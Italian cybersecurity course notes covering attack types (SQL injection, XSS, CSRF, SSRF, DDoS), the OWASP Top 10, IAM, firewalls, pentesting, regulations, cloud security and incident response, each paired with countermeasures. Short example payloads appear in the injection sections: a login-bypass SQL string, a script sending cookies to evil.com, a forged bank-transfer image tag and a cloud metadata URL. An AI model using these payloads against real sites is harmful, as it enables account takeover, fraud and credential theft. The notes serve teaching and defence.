AmplificationL3DNS/NTP usati come amplificatori (fattore 50-100x)
SlowlorisL7Connessioni aperte lentissime → esaurisce thread server
💡 Contromisure: CDN con scrubbing (Cloudflare, Akamai), rate limiting, ACL, BGP blackholing, anycast.
SQL Injection
OWASP A03

L'attaccante inserisce codice SQL in un campo di input per manipolare le query del database — lettura, modifica, cancellazione dati o bypass autenticazione.

-- Input malevolo nel campo username:
' OR '1'='1

-- Query risultante:
SELECT * FROM users WHERE user='' OR '1'='1' AND pass='x'
-- Risultato: accede senza credenziali valide
VarianteDescrizione
Error-basedL'errore SQL rivela la struttura del database
Union-basedUNION SELECT per estrarre dati da altre tabelle
Blind (Boolean)Risposta diversa se condizione vera/falsa (nessun errore visibile)
Time-based BlindSLEEP() → il ritardo della risposta rivela i dati
✔ Contromisure: prepared statements / query parametrizzate, ORM, input validation, WAF, privilegio minimo sul DB.
XSS — Cross-Site Scripting
OWASP A03

Injection di codice JavaScript malevolo in una pagina web. Il browser della vittima esegue lo script nel contesto del sito legittimo → furto cookie, reindirizzamento, defacement.

TipoDescrizione
Stored (Persistent)Script salvato nel DB, eseguito ad ogni visita della pagina
ReflectedScript nella URL, eseguito solo se la vittima clicca il link malevolo
DOM-basedManipolazione del DOM lato client, non passa dal server
<script>document.location='https://evil.com/?c='+document.cookie</script>
// Ruba i cookie di sessione e li invia all'attaccante
✔ Contromisure: output encoding (HTML escaping), Content Security Policy (CSP), flag HttpOnly sui cookie, validazione input.
CSRF — Cross-Site Request Forgery
Sessione

Forza l'utente autenticato a eseguire azioni indesiderate su un sito a cui è loggato, sfruttando la sessione già attiva nel browser.

<!-- Pagina malevola visitata dalla vittima loggata in banca: -->
<img src="https://banca.it/bonifico?dest=attaccante&importo=5000">
<!-- Il browser invia la richiesta con i cookie di sessione della banca -->

Differenza con XSS: XSS sfrutta fiducia del browser nell'utente. CSRF sfrutta fiducia del server nella sessione.

✔ Contromisure: CSRF token univoco per ogni form, SameSite cookie attribute (Lax/Strict), verifica header Origin/Referer.
16

Topologie di Rete

Confronto topologie
TopologiaMeccanismoGuasto nodoGuasto cavoScalabilità
BusBroadcast su cavoIsolato⚠ Rete giùBassa
StellaSwitch centrale✓ Isolato✓ IsolatoAlta
AnelloTOKEN antiorario⚠ Blocca*⚠ BloccaMedia
MagliaLink multipli OSPF/BGP✓ Bypass✓ BypassAlta
AlberoCore→Dist→AccessParzialeParzialeAlta
IbridaCombinazioneDipendeDipendeAlta

* MAU bypassa automaticamente il nodo guasto.

TOKEN Ring — IEEE 802.5

TOKEN = frame speciale che circola antiorario. Solo chi ha il token può trasmettere. Deterministico, no collisioni. Oggi obsoleto — sostituito da Ethernet.

17

OWASP — Top 10 (2021)

Open Web Application Security Project

Lista aggiornata delle vulnerabilità web più critiche. Riferimento standard mondiale.

A01 🔴
Broken Access Control
Accesso senza permessi (IDOR, escalation)
A02 🔴
Cryptographic Failures
Password in chiaro, HTTP al posto di HTTPS
A03 🔴
Injection
SQL, OS, LDAP, XSS via input non validato
A04 🟠
Insecure Design
Architettura senza sicurezza by design
A05 🟠
Security Misconfiguration
Config default, porte aperte, errori verbosi
A06 🟠
Vulnerable Components
Librerie con CVE note non aggiornate
A07 🟡
Auth & Session Failures
Brute force, session fixation, token deboli
A08 🟡
Software & Data Integrity
Pipeline CI/CD senza firme crittografiche
A09 🟡
Security Logging Failures
Log insufficienti → attacchi non rilevati
A10 🟡
SSRF
Il server fa richieste interne per l'attaccante
A01 — Broken Access Control

L'app non verifica i permessi. Esempi: /admin via URL, IDOR (id=123→124), escalation verticale. Contromisure: deny-by-default, controlli lato server, minimo privilegio.

A02 — Cryptographic Failures

Cifratura assente o inadeguata. Esempi: password in chiaro, HTTP, MD5/SHA-1 per password, chiavi hardcoded. Contromisure: HTTPS+HSTS, bcrypt/Argon2+SALT, TLS 1.2/1.3.

A03 — Injection

Input non sanificato eseguito come codice.

SELECT * FROM users WHERE user='' OR '1'='1'
→ Bypassa autenticazione

Contromisure: prepared statements, validazione input, WAF.

💡 A01+A02+A03 = maggior parte degli attacchi reali. Sono problemi di CODICE — il WAF è un palliativo.
A04 — Insecure Design
OWASP 2021

Difetti architetturali e di progettazione — mancanza di threat modeling, assenza di security requirements, design pattern non sicuri. Non è un bug di implementazione ma di concezione.

⚠️ Contromisure: threat modeling (STRIDE, PASTA), secure design patterns, principio defence in depth, revisione architetturale.
A05 — Security Misconfiguration
OWASP 2021

Configurazioni di default non cambiate, porte/servizi inutili aperti, permessi eccessivi, messaggi di errore verbosi che rivelano informazioni interne.

  • Credenziali di default su router/DB/applicazioni
  • Directory listing attiva su web server
  • CORS troppo permissivo (Access-Control-Allow-Origin: *)
  • Debug mode attivo in produzione
  • S3 bucket pubblici non intenzionali (AWS)
✔ Contromisure: hardening checklist (CIS Benchmarks), IaC con configurazioni sicure, scanner di configurazione, patch management.
A06 — Vulnerable and Outdated Components
OWASP 2021

Librerie, framework e componenti con vulnerabilità note e non aggiornate. La supply chain software è un vettore di attacco crescente.

  • Log4Shell (CVE-2021-44228) — Log4j usato in milioni di applicazioni Java
  • SolarWinds — aggiornamento software conteneva backdoor
  • npm packages malevoli — dependency confusion, typosquatting
✔ Contromisure: SCA (Software Composition Analysis), SBOM (Software Bill of Materials), Dependabot, policy di aggiornamento.
A07 — Identification and Authentication Failures
OWASP 2021

Difetti nei meccanismi di autenticazione e gestione delle sessioni che permettono all'attaccante di impersonare altri utenti.

  • Password deboli o senza rate limiting → brute force
  • Session token predicibili o non invalidati dopo logout
  • Mancanza di MFA su account critici
  • Credenziali in chiaro in URL o log
  • Gestione errata del "recupera password"
✔ Contromisure: MFA, password policy robusta, session management sicuro (token random, scadenza, invalidazione al logout), rate limiting.
A08 — Software and Data Integrity Failures
OWASP 2021

Codice o dati che vengono assunti integri senza verifica — pipeline CI/CD non sicure, update automatici non firmati, deserializzazione non sicura.

  • Plugin/librerie scaricati senza verifica firma digitale
  • Pipeline CI/CD con accesso write non protetto
  • Deserializzazione di oggetti non attendibili → RCE
  • Insecure auto-update (HTTP invece di HTTPS + firma)
✔ Contromisure: firma digitale su pacchetti e artefatti, verifica hash, pipeline CI/CD con least privilege, no deserializzazione da input utente.
A09 — Security Logging and Monitoring Failures
OWASP 2021

Senza log adeguati, un attacco può passare inosservato per mesi. Il tempo medio di rilevamento di un breach è ancora superiore a 200 giorni.

  • Login falliti non loggati → brute force invisibile
  • Log senza timestamp affidabile o con dati insufficienti
  • Assenza di SIEM o alert su eventi anomali
  • Log non protetti → l'attaccante li cancella dopo il breach
✔ Contromisure: SIEM centralizzato, log immutabili (WORM storage), alert su eventi critici, incident response plan testato.
A10 — Server-Side Request Forgery (SSRF)
OWASP 2021

L'attaccante forza il server a effettuare richieste HTTP verso risorse interne o esterne arbitrarie — bypassando firewall e accedendo a servizi cloud metadata.

# Esempio: parametro URL non validato
https://sito.it/fetch?url=http://169.254.169.254/latest/meta-data/
# → accede ai metadata AWS dalla rete interna del server
⚠️ Particolarmente pericoloso in cloud: i metadata AWS/GCP/Azure contengono credenziali IAM. Contromisure: whitelist URL, blocca accesso a 169.254.x.x, IMDSv2.
18

IAM — Identity & Access Management

Identity & Access Management

Framework di policy e tecnologie per garantire che le persone giuste accedano alle risorse giuste al momento giusto per le ragioni giuste.

PilastroDomandaRisposta
IdentificationChi sei?Username, certificato, token
Authentication (AuthN)Sei davvero tu?Password, MFA, biometria
Authorization (AuthZ)Cosa puoi fare?Permessi, ruoli, ACL
AccountingCosa hai fatto?Log, audit trail
Autenticazione & MFA
AuthN

L'autenticazione verifica l'identità. MFA (Multi-Factor Authentication) richiede almeno 2 fattori di categorie diverse.

FattoreTipoEsempi
KnowledgeQualcosa che SAIPassword, PIN, domanda segreta
PossessionQualcosa che HAIOTP via SMS, app authenticator, smart card, token hardware
InherenceQualcosa che SEIImpronta digitale, riconoscimento facciale, retina
LocationDove SEIGeofencing, IP aziendale
⚠️ OTP via SMS è vulnerabile a SIM swapping. Preferire app authenticator (TOTP/HOTP) o chiavi hardware (FIDO2/WebAuthn).
Autorizzazione & Modelli di controllo accessi
AuthZ
ModelloNomeLogicaUso tipico
DACDiscretionary ACIl proprietario decide chi accedeFilesystem Unix, condivisioni
MACMandatory ACLabel di sicurezza (Top Secret, Confidential…)Sistemi militari, SELinux
RBACRole-Based ACPermessi assegnati a ruoli, utenti assegnati a ruoliActive Directory, cloud IAM
ABACAttribute-Based ACPolicy su attributi (ruolo + ora + posizione + risorsa)Zero Trust, cloud policy
SSO — Single Sign-On
Federazione

Un'unica autenticazione dà accesso a più sistemi/applicazioni senza re-inserire le credenziali.

ProtocolloUso
SAML 2.0SSO enterprise, XML-based (IdP → SP)
OAuth 2.0Delegazione accessi API ("Login con Google")
OpenID ConnectAuthN su OAuth 2.0 (identità + token JWT)
KerberosSSO LAN Windows (ticket-based, Active Directory)
💡 SSO riduce la superficie di attacco (meno password) ma crea un singolo punto di fallimento — proteggere con MFA forte.
Privilegio Minimo & Privilege Creep
Least Privilege

Principio del privilegio minimo (PoLP): ogni utente, processo o sistema deve avere solo i permessi strettamente necessari al proprio compito.

  • Privilege creep: accumulo progressivo di permessi nel tempo (promozioni, cambio ruolo) senza revoca di quelli precedenti
  • Separazione dei privilegi: nessun singolo account deve poter fare tutto
  • Just-in-time (JIT): privilegi elevati concessi solo quando servono e per un tempo limitato
  • PAM (Privileged Access Management): strumenti per gestire, monitorare e registrare l'uso di account privilegiati
⚠️ Un ransomware che compromette un account admin può cifrare tutto. Con il minimo privilegio il danno è confinato.
19

Firewall, IDS/IPS & VPN

Firewall
Perimetro

Dispositivo o software che filtra il traffico di rete in base a regole (policy), controllando cosa entra e cosa esce dalla rete.

GenerazioneLivello OSIAnalisiEsempio
Packet FilterL3/L4IP src/dst, porta, protocollo — statelessiptables base
Stateful (SPI)L3/L4Traccia stato connessioni TCPiptables conntrack
Application (Proxy)L7Ispeziona payload applicativo (HTTP, DNS…)Squid, Palo Alto
NGFWL7DPI, IPS integrato, identità utente, SSL inspectionFortinet, Palo Alto, Cisco FTD
WAFL7Solo traffico HTTP/S, protegge applicazioni webModSecurity, Cloudflare WAF
💡 DMZ (DeMilitarized Zone): segmento di rete tra firewall esterno e interno, ospita server pubblici (web, mail) isolati dalla rete interna.
IDS & IPS
Rilevamento / Prevenzione

IDS (Intrusion Detection System): monitora e avvisa di attività sospette ma non blocca. IPS (Intrusion Prevention System): rileva e blocca in tempo reale.

CaratteristicaIDSIPS
PosizioneOut-of-band (copia traffico)Inline (nel flusso dati)
AzioneAlert/logBlock/drop/reset
Rischio falsi positiviBasso impattoAlto — può bloccare traffico legittimo
TipoSiglaMonitora
Network-basedNIDS/NIPSTraffico di rete (packet capture)
Host-basedHIDS/HIPSLog di sistema, syscall, file integrity

Metodi di rilevamento: signature-based (pattern noti, bassa efficacia su 0-day) · anomaly-based (deviazione dal baseline, più efficace su attacchi nuovi) · stateful protocol analysis.

VPN — Virtual Private Network
Tunnel cifrato

Crea un tunnel cifrato tra client e server VPN, proteggendo il traffico da intercettazioni e mascherando l'IP reale dell'utente.

ProtocolloPortaNote
IPsec/IKEv2UDP 500/4500Robusto, usato in VPN aziendali site-to-site
OpenVPNUDP/TCP 1194Open source, molto flessibile
WireGuardUDP 51820Moderno, veloce, codice ridotto → meno vulnerabilità
SSL/TLS VPNTCP 443Passa firewall restrittivi, clientless (browser)
L2TP/IPsecUDP 1701Legacy — evitare dove possibile
⚠️ VPN ≠ anonimato totale. Il provider VPN vede il traffico. Split tunneling: solo traffico aziendale passa per la VPN, il resto va diretto.
20

Vulnerability Assessment & Penetration Test

Vulnerability Assessment
Identificazione

Processo sistematico per identificare, classificare e prioritizzare le vulnerabilità in un sistema — senza sfruttarle.

  1. Pianificazione: scope, asset da testare, finestre di manutenzione
  2. Scansione: tool automatizzati (Nessus, OpenVAS, Nmap) identificano CVE
  3. Analisi: eliminazione falsi positivi, classificazione per CVSS
  4. Report: lista vulnerabilità con severità, impatto e remediation
  5. Remediation & re-scan: verifica delle patch applicate
💡 VA ≠ Pentest: il VA trova le porte aperte, il pentest ci entra dentro. Il VA è più ampio ma meno approfondito.
Penetration Test
Sfruttamento controllato

Simulazione controllata di un attacco reale — il pentester sfrutta le vulnerabilità per valutare l'impatto reale e la capacità di rilevamento/risposta.

TipoConoscenza inizialeSimula
Black BoxNessuna (solo IP/dominio)Attaccante esterno ignoto
Gray BoxParziale (credenziali user, schema rete)Insider a basso privilegio
White BoxCompleta (codice sorgente, architettura)Revisione sicurezza completa

Fasi (metodologia PTES/OWASP): Recon → Scanning → Exploitation → Post-exploitation → Reporting

⚠️ Un pentest richiede sempre autorizzazione scritta (ROE — Rules of Engagement). Effettuarlo senza autorizzazione è reato.
Footprinting & Ricognizione
Fase 1 Pentest

Raccolta di informazioni sul target prima di qualsiasi interazione diretta — OSINT (Open Source Intelligence).

TecnicaStrumentoInformazione raccolta
DNS lookupnslookup, digRecord A, MX, NS, TXT, zone transfer
WHOISwhoisRegistrante dominio, date, nameserver
Google DorkingMotore GoogleFile esposti, pannelli admin, errori
Shodanshodan.ioDispositivi internet-facing, banner servizi
traceroutetracert/tracerouteTopologia di rete, hop intermedi
Social mediaLinkedIn, GitHubDipendenti, tecnologie usate, email
Strumenti VA & Penetration Test
Toolkit
StrumentoCategoriaUso
NmapNetwork scannerPort scan, OS detection, service version
Nessus / OpenVASVulnerability scannerScansione CVE automatizzata
MetasploitExploitation frameworkLibreria exploit, payload, post-exploitation
Burp SuiteWeb proxyIntercetta/modifica richieste HTTP, test OWASP
WiresharkPacket analyzerCattura e analisi traffico di rete
Hashcat / JohnPassword crackerBrute force / dictionary attack su hash
SQLmapSQL InjectionRilevamento e sfruttamento automatico SQLi
NiktoWeb scannerScan vulnerabilità web server
Kali LinuxOSDistribuzione Linux con tutti gli strumenti integrati
21

Normative & Standard

GDPR — Regolamento UE 2016/679
Privacy

Regolamento europeo sulla protezione dei dati personali, in vigore dal 25 maggio 2018. Si applica a qualsiasi organizzazione che tratti dati di cittadini UE.

PrincipioSignificato
Liceità, correttezza, trasparenzaBase giuridica per il trattamento (consenso, contratto, obbligo legale…)
Limitazione della finalitàDati raccolti solo per scopi determinati ed espliciti
MinimizzazioneSolo i dati strettamente necessari
EsattezzaDati aggiornati e corretti
Limitazione della conservazioneNon oltre il tempo necessario
Integrità e riservatezzaMisure tecniche e organizzative adeguate
  • Data breach: notifica all'Autorità (Garante) entro 72 ore
  • Sanzioni: fino a €20M o 4% del fatturato globale annuo
  • DPO (Data Protection Officer): obbligatorio per enti pubblici e grandi trattatori
  • Diritti dell'interessato: accesso, rettifica, cancellazione (diritto all'oblio), portabilità, opposizione
ISO/IEC 27001
ISMS

Standard internazionale per la gestione della sicurezza delle informazioni (ISMS — Information Security Management System). Certificabile da enti accreditati.

  • Basato sul ciclo PDCA (Plan-Do-Check-Act)
  • Annesso A: 93 controlli di sicurezza organizzati in 4 domini (organizzativo, persone, fisico, tecnologico)
  • Richiede risk assessment documentato e trattamento dei rischi
  • Audit di certificazione + sorveglianza annuale + rinnovo ogni 3 anni
💡 ISO 27001 non dice COME implementare i controlli — dice COSA fare e dimostrare. ISO 27002 fornisce le linee guida pratiche.
NIST Cybersecurity Framework (CSF)
Risk Management

Framework volontario del NIST (National Institute of Standards and Technology) per gestire il rischio cyber. Versione 2.0 pubblicata nel 2024.

FunzioneObiettivo
GovernStrategia, policy, ruoli (nuovo in CSF 2.0)
IdentifyInventario asset, valutazione rischi
ProtectControlli preventivi, accessi, training
DetectMonitoraggio, rilevamento anomalie
RespondIncident response, contenimento
RecoverRipristino, business continuity
Direttiva NIS2 — UE 2022/2555
Cybersecurity UE

Aggiornamento della Direttiva NIS (2016), in vigore dal 2023 con recepimento entro ottobre 2024. Estende gli obblighi di sicurezza a molti più settori.

  • Settori essenziali: energia, trasporti, banche, infrastrutture digitali, sanità, acqua, spazio
  • Settori importanti: servizi postali, gestione rifiuti, produzione, fornitori digitali
  • Obblighi: misure di gestione del rischio, notifica incidenti entro 24h (alert) e 72h (notifica completa)
  • Responsabilità del management: gli organi direttivi rispondono personalmente
  • Sanzioni: fino a €10M o 2% fatturato globale (settori essenziali)
Privacy by Design & Privacy by Default
Art. 25 GDPR
PrincipioSignificato pratico
Privacy by DesignLa protezione dei dati è integrata nella progettazione del sistema fin dall'inizio, non aggiunta dopo
Privacy by DefaultLe impostazioni predefinite devono essere le più privacy-friendly possibili (es. profilo privato di default)

7 principi fondanti (Ann Cavoukian): proattivo · privacy di default · privacy nel design · funzionalità totale · sicurezza end-to-end · visibilità · rispetto per la privacy utente.

22

Cloud Security

Modelli di Servizio Cloud
IaaS · PaaS · SaaS
ModelloGestisci tuGestisce il providerEsempi
IaaSOS, middleware, app, datiHardware, rete, storage fisicoAWS EC2, Azure VM, GCP Compute
PaaSApp e datiOS, runtime, middleware, infraHeroku, Google App Engine, Azure App Service
SaaSSolo configurazione e datiTutto il restoOffice 365, Salesforce, Google Workspace

Modelli di deployment: Public cloud (risorse condivise) · Private cloud (dedicato) · Hybrid (on-premise + cloud) · Multi-cloud (più provider).

💡 Shared Responsibility Model: il confine tra responsabilità del cliente e del provider varia per modello. In SaaS il provider è responsabile della sicurezza della piattaforma; i dati restano responsabilità del cliente.
Rischi Cloud & Contromisure
RischioContromisura
Misconfiguration (S3 pubblici, SG aperti)CSPM (Cloud Security Posture Management), policy IaC
IAM eccessivamente permissivoLeast privilege, MFA, revisione periodica permessi
Data breach su storage cloudCifratura at-rest e in-transit, CASB
Insider threatUEBA, logging accessi, separazione dei privilegi
API non protetteAPI Gateway, OAuth 2.0, rate limiting, WAF
SSRF verso metadata endpointIMDSv2 (AWS), blocco 169.254.169.254
Azure, AWS & Google Cloud — Panoramica sicurezza
AreaAWSAzureGCP
IAMAWS IAM, SCPAzure AD / Entra IDCloud IAM
Firewall/WAFSecurity Groups, AWS WAFNSG, Azure FirewallVPC Firewall, Cloud Armor
Vulnerability mgmtAmazon InspectorMicrosoft DefenderSecurity Command Center
SIEMAWS Security HubMicrosoft SentinelChronicle
LoggingCloudTrailAzure Monitor / Audit LogsCloud Audit Logs
Key ManagementKMSKey VaultCloud KMS
23

Incident Management

Fasi di Incident Response
NIST SP 800-61
#FaseAttività principali
1PreparationPolicy, procedure, team IR, playbook, strumenti, training
2Detection & AnalysisIdentificazione incidente, triage, classificazione severità
3ContainmentIsolare sistemi compromessi (short-term), preservare prove
4EradicationRimuovere malware, chiudere vettori d'accesso, patch
5RecoveryRipristino sistemi, verifica funzionalità, monitoraggio intensivo
6Post-incident (Lessons Learned)Report, root cause analysis, miglioramenti
⚠️ Non spegnere mai un sistema compromesso prima di raccogliere prove (RAM dump, log) — si perderebbero le evidenze.
Forensic Digitale
DFIR

Disciplina che raccoglie, preserva e analizza le prove digitali mantenendo la chain of custody (catena di custodia) per uso legale.

  • Ordine di volatilità: raccogliere prima le prove più volatili (RAM → processi → connessioni → log → disco)
  • Imaging forense: copia bit-per-bit del disco con hash MD5/SHA256 per verificare integrità
  • Analisi artefatti: registry Windows, prefetch, log eventi, timestamp MACB (Modified, Accessed, Changed, Born)
  • Timeline analysis: ricostruzione cronologica degli eventi
  • Strumenti: Autopsy, FTK, Volatility (RAM), Sleuth Kit
SIEM — Security Information and Event Management

Piattaforma che raccoglie, normalizza e correla log da tutta l'infrastruttura per rilevare minacce in tempo reale e supportare le indagini forensi.

FunzioneDescrizione
Log aggregationRaccolta centralizzata da firewall, IDS, server, endpoint
NormalizationFormato comune per log eterogenei
CorrelationRegole che collegano eventi multipli → rilevamento attacchi complessi
AlertingNotifiche su eventi critici al SOC
RetentionConservazione log per compliance (es. 12 mesi per NIS2)

Esempi: Splunk, IBM QRadar, Microsoft Sentinel, Elastic SIEM, Wazuh (open source).

24

Mobile Security & IoT

Mobile Security
Android · iOS
MinacciaDescrizione
Malware mobileApp malevole da store non ufficiali, adware aggressivo
Rogue Wi-Fi / Evil TwinAP falso che intercetta il traffico (MitM)
Smishing / VishingPhishing via SMS/chiamata
App permission abuseApp richiedono permessi eccessivi (microfono, posizione, contatti)
Jailbreak / RootRimuove sandbox del sistema → esposizione maggiore
SIM SwappingPortabilità fraudolenta SIM → bypass OTP via SMS

Contromisure: MDM (Mobile Device Management) per dispositivi aziendali · aggiornamenti OS e app · store ufficiali · VPN aziendale · cifratura dispositivo · remote wipe.

💡 Certificate pinning: l'app verifica il certificato del server contro una lista interna — protegge da MitM anche con CA compromessa.
IoT Security
Internet of Things

I dispositivi IoT (telecamere, sensori, router, PLC industriali) sono spesso il punto di ingresso più debole delle reti aziendali e domestiche.

ProblemaImpatto
Credenziali di default non cambiateAccesso diretto all'interfaccia admin
Firmware non aggiornatoCVE note e non patchate
Protocolli insicuri (Telnet, HTTP)Traffico in chiaro intercettabile
Assenza di cifraturaDati trasmessi in chiaro (es. telecamere)
Superficie di attacco enormeMiliardi di dispositivi, aggiornamenti difficili

Caso Mirai Botnet (2016): 600.000 dispositivi IoT con credenziali di default compromessi → DDoS da 1.1 Tbps.

Contromisure: segmentazione VLAN IoT isolata · cambio credenziali di default · aggiornamenti firmware · disabilitare servizi inutili · network monitoring.

25

Business Continuity & Disaster Recovery

BCP & DRP
Continuità operativa
PianoAcronimoFocus
Business Continuity PlanBCPMantiene operativi i processi critici durante un'interruzione
Disaster Recovery PlanDRPRipristino dei sistemi IT dopo un disastro
Business Impact AnalysisBIAIdentifica processi critici, stima impatto economico del downtime
Incident Response PlanIRPRisposta a incidenti di sicurezza (cyber)

Il BCP comprende il DRP — il DRP è il sottopiano che gestisce il ripristino IT.

RTO & RPO
Metriche DR
MetricaNome completoDefinizione
RTORecovery Time ObjectiveTempo massimo accettabile per ripristinare il servizio dopo un'interruzione
RPORecovery Point ObjectiveQuantità massima di dati che si può perdere (finestra temporale tra un backup e l'altro)
Disastro accade alle 14:00
Ultimo backup alle 12:00 → RPO = 2 ore (si perdono 2 ore di dati)
Sistemi ripristinati alle 18:00 → RTO = 4 ore
💡 RTO e RPO bassi = costi alti (hot standby, replica real-time). RTO e RPO alti = costi bassi ma maggiore perdita di dati/operatività.
Strategie di Backup
3-2-1

Regola 3-2-1: 3 copie dei dati · su 2 supporti diversi · di cui 1 offsite (fuori sede).

TipoCosa salvaDimensioneTempo ripristino
FullTuttoGrandeRapido
IncrementalSolo modifiche dall'ultimo backup (full o incr.)PiccolaLento (catena)
DifferentialModifiche dall'ultimo fullMediaMedio

Tecniche avanzate: mirroring (sincrono, RPO≈0) · snapshot · replicazione asincrona · backup immutabile (WORM — Write Once Read Many).

⚠️ Il ransomware può cifrare anche i backup se collegati alla rete. I backup offline (air-gapped) o immutabili sono l'unica garanzia reale.